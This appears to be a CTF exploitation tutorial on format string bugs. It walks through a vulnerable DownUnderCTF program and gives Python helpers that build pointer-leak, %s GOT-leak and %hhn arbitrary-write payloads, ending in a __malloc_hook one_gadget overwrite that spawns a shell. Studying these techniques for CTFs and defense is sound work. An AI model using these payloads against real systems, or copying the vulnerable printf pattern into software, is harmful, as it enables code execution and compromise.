Format String Bug

Abusing format string specifiers to leak and write addresses

TLDR

Requirements

Use of printf with user-supplied input passed directly as the format string

What can you do with this?

Arbitrary Read - use %p format specifiers to leak pointers on the stack, potentially revealing interesting information (e.g. libc addresses, variables)

Arbitrary Write - determine which pointers on the stack you want to overwrite and use the %n format specifier to do so

Arbitrary Read

Identifying this vulnerability is relatively straightforward: we look for user-supplied input that is passed directly into printf as the format string.

The example below is from DownUnderCTF2020 and will be the main challenge we are referencing throughout this page.

#include <stdio.h>
#define INPUT_SIZE  64
#define INPUT_TIMES  3

__attribute__((constructor))
void setup() {
    /* Mode 2 is _IONBF on glibc: disable buffering on both streams */
    setvbuf(stdout, 0, 2, 0);
    setvbuf(stdin, 0, 2, 0);
}

int main() {
    char buffer[INPUT_SIZE];
    int i;

    for (i = 0; i < INPUT_TIMES; i++) {
        fgets(buffer, INPUT_SIZE, stdin);
        /* Vulnerable: user input is used as the format string */
        printf(buffer);
    }

    return 0;
}

We see that our user input is passed directly to printf as the format string. We can verify this by sending the format specifier %p, which prints its argument as a pointer.

Successful Leak!

To reference a specific offset (e.g. offset 8), we can use %offset$p, for example %8$p, to print only the value at that position.

This can be used to leak a lot of useful information for stack exploitation, such as stack canaries, libc addresses and more.
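As a rough illustration of positional leaks, the sketch below builds a payload that prints a range of offsets and turns the reply back into integers. The helper names and the `|` separator are assumptions made for this example, and the payload still has to fit into the 64-byte buffer of the challenge.

```python
def build_leak_payload(first, last):
    """Return a format string such as b'%6$p|%7$p|%8$p' for offsets first..last."""
    return b"|".join(b"%%%d$p" % i for i in range(first, last + 1))


def parse_leaks(output, first):
    """Map each offset to the value printf printed for it ('(nil)' becomes 0)."""
    values = {}
    for i, field in enumerate(output.strip().split(b"|")):
        text = field.decode()
        values[first + i] = 0 if text == "(nil)" else int(text, 16)
    return values
```

For example, `build_leak_payload(6, 8)` yields `b"%6$p|%7$p|%8$p"`, and feeding the program's reply to `parse_leaks(reply, 6)` gives a dictionary keyed by offset.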

In this run, we are able to leak the libc address 0x7ffff7821b97.
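A leaked libc pointer is only useful once it is turned into the libc base. A minimal sketch of that arithmetic follows; the value of `LEAK_OFFSET` is an assumption (it depends on the exact libc build and on which pointer was leaked) and has to be looked up for the target.

```python
# Assumption: offset of the leaked pointer inside the target's libc.
LEAK_OFFSET = 0x21B97


def libc_base_from_leak(leak, leak_offset=LEAK_OFFSET):
    """Subtract the known offset and sanity-check that the base is page-aligned."""
    base = leak - leak_offset
    if base & 0xFFF:
        raise ValueError("base is not page-aligned, the offset is probably wrong")
    return base
```

The page-alignment check is a cheap way to notice a wrong offset or a wrong libc version early.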

Assuming you know at which offset your input sits, you can also leak the contents behind an arbitrary pointer by using %s. Here is an example from WWCTF.

We have a simple printf vulnerability here, and by using the %s format specifier we can dereference arbitrary memory addresses. To get a libc leak, we can provide the puts@GOT address, which when dereferenced gives us the actual runtime address of puts in libc.

puts@GOT has already been resolved, as puts has been called once in the function.

Below is an excerpt of my solve script, where %s was used to leak the libc base.
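The general shape of such a %s leak can be sketched as follows. This is not the original solve script: the helper names, the `#END` marker and the example values are assumptions for illustration. The address is placed after the specifier because a 64-bit address contains null bytes, which would end the format string early if it came first.

```python
import struct

MARKER = b"#END"  # assumption: any byte string unlikely to appear in the leak


def build_s_leak(target_addr, buf_offset):
    """Place '%<n>$s' + MARKER in the first 8-byte slot(s), then the address."""
    for slots in (1, 2):
        head = b"%%%d$s" % (buf_offset + slots) + MARKER
        if len(head) <= 8 * slots:
            return head.ljust(8 * slots, b"_") + struct.pack("<Q", target_addr)
    raise ValueError("specifier does not fit, offset too large for this sketch")


def parse_s_leak(output):
    """Bytes before MARKER are the little-endian pointer, cut at its first null."""
    leaked = output.split(MARKER, 1)[0][:8]
    return struct.unpack("<Q", leaked.ljust(8, b"\x00"))[0]
```

With the buffer at offset 6 and a hypothetical puts@GOT at 0x404018, `build_s_leak(0x404018, 6)` produces `%7$s#END` followed by the packed address; subtracting the offset of puts in libc from the parsed value then gives the libc base.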

%s also prints until it reads a null byte \x00, so this can be useful when leaking canaries, assuming you have control over the buffer that is being printed. Below is an example.
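The canary idea can be sketched like this: on x86-64 Linux the lowest byte of the stack canary is \x00, so once that byte has been overwritten, a string print of the buffer runs on into the remaining 7 bytes. The helper below (a hypothetical name) only rebuilds the value from those bytes; how they are obtained depends on the challenge.

```python
import struct


def rebuild_canary(leaked):
    """leaked: bytes printed right after the overwritten null byte of the canary."""
    if len(leaked) < 7:
        # The canary contained another null byte, so the print stopped early.
        raise ValueError("need at least 7 canary bytes")
    return struct.unpack("<Q", b"\x00" + leaked[:7])[0]
```

Remember to restore the original null byte when the canary is written back, otherwise the stack check fails.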

Arbitrary Write

printf's %n specifier takes a pointer to an int and stores in it the number of characters written so far.

Let's take this program as an example.

%n will store the value 10 in the variable c, as there were 10 characters printed before %n was processed.

So if we control the format string and can get a pointer of our choice onto the stack, %n gives us an arbitrary write.

This can be further automated with pwntools' fmtstr_payload function.

Let's see how we can leverage printf alone to obtain a shell.
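To make concrete what such a helper automates, here is a minimal pure-Python sketch for 64-bit targets that writes single bytes with %hhn. It is not pwntools' implementation; the function name, the fixed 16 bytes reserved per write and the `A` padding are assumptions of this example.

```python
import struct


def build_byte_writes(buf_offset, writes):
    """writes: list of (address, byte_value); buf_offset: offset of our buffer."""
    reserve = 16 * len(writes)                 # room for the specifier part
    first_addr_index = buf_offset + reserve // 8
    fmt = b""
    printed = 0                                # printf's running character count
    for i, (_, value) in enumerate(writes):
        pad = (value - printed) % 256          # %hhn keeps only the low byte
        if pad:
            fmt += b"%%%dc" % pad
            printed += pad
        fmt += b"%%%d$hhn" % (first_addr_index + i)
    if len(fmt) > reserve:
        raise ValueError("specifiers do not fit in the reserved space")
    addrs = b"".join(struct.pack("<Q", addr) for addr, _ in writes)
    # Padding comes after every %hhn, so it no longer affects any write.
    return fmt.ljust(reserve, b"A") + addrs
```

The addresses go last because they contain null bytes, and the specifier part is padded to a multiple of 8 so that each address lines up with one positional argument.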

  1. We perform a stack leak by using %p to print the pointers on the stack. Since we need a libc leak, we target offset 19 with the format %19$p.

  2. Using the libc leak, we compute the address of __malloc_hook, which is useful because printf calls malloc when it has to produce a very large output.

    1. We can then write the address of a one_gadget into &__malloc_hook using pwntools' fmtstr_payload.

  3. For our last printf call, we trigger malloc by requesting a very large output (e.g. %65510c). malloc() in turn calls __malloc_hook, which now points to our one_gadget and gives us a shell.
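The three stages above can be sketched as plain address arithmetic. Both offsets are assumptions that depend on the target's libc build, the one_gadget's constraints must hold at the call site, and the function name is hypothetical. The sketch splits the gadget into three 16-bit chunks (suitable for %hn writes) and assumes the top two bytes of the hook are already zero.

```python
# Assumptions: offsets taken from the target's libc, not universal values.
MALLOC_HOOK_OFFSET = 0x3EBC30
ONE_GADGET_OFFSET = 0x4F322

LEAK_STAGE = b"%19$p"       # stage 1: leak a libc pointer
TRIGGER_STAGE = b"%65510c"  # stage 3: large output makes printf call malloc


def plan_hook_overwrite(libc_base):
    """Return the hook address, the gadget address and the 16-bit writes."""
    hook = libc_base + MALLOC_HOOK_OFFSET
    gadget = libc_base + ONE_GADGET_OFFSET
    # Three chunks cover the 48 significant bits of a userland address.
    writes = [(hook + 2 * i, (gadget >> (16 * i)) & 0xFFFF) for i in range(3)]
    return hook, gadget, writes
```

Stage 2 then has to turn `writes` into a format string that fits in the 63 usable bytes of the buffer, which is the part fmtstr_payload handles in the steps above.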

Let's look at an example where pwntools cannot save us and we have to do a manual write.

The first thought is to do a simple GOT overwrite with a one_gadget. However, the strtol check requires the number after a % character to have two digits and be less than 58, which means that with %<no of char>c%offset$hhn a single padding can only cover the range from 10 to 57.

Misc Stuff

  • To determine whether the value you leaked is a libc address, use the address() function in pwndbg and check the mapping and its permissions (rwx) with vmmap

  • On x86-64, printf takes offsets 1 to 5 from registers (rsi, rdx, rcx, r8, r9), so stack values, including the buffer containing your input, start from offset 6 onwards

  • printf keeps an internal counter of the characters printed so far, which is especially important when chaining multiple %n writes

    • The counter is cumulative, so %57c%10$hhn%57c%10$hhn leaves the same final value as %114c%10$hhn
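The cumulative counter can be checked with a small model of printf's bookkeeping. This is a sketch with simplifying assumptions: it only understands %<n>c and %<k>$hhn tokens, ignores literal characters, and returns the byte each positional argument would end up holding.

```python
import re

TOKEN = re.compile(r"%(\d+)c|%(\d+)\$hhn")


def simulate_hhn(fmt):
    """Return {positional index: last byte written} for a format string."""
    printed = 0
    stored = {}
    for width, index in TOKEN.findall(fmt):
        if width:
            printed += int(width)                 # %<n>c prints n characters
        else:
            stored[int(index)] = printed % 256    # %hhn stores the low byte only
    return stored
```

Both `simulate_hhn("%57c%10$hhn%57c%10$hhn")` and `simulate_hhn("%114c%10$hhn")` end with 114 at argument 10, and the modulo shows why a later write can still produce a smaller byte: the counter simply wraps past 256.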
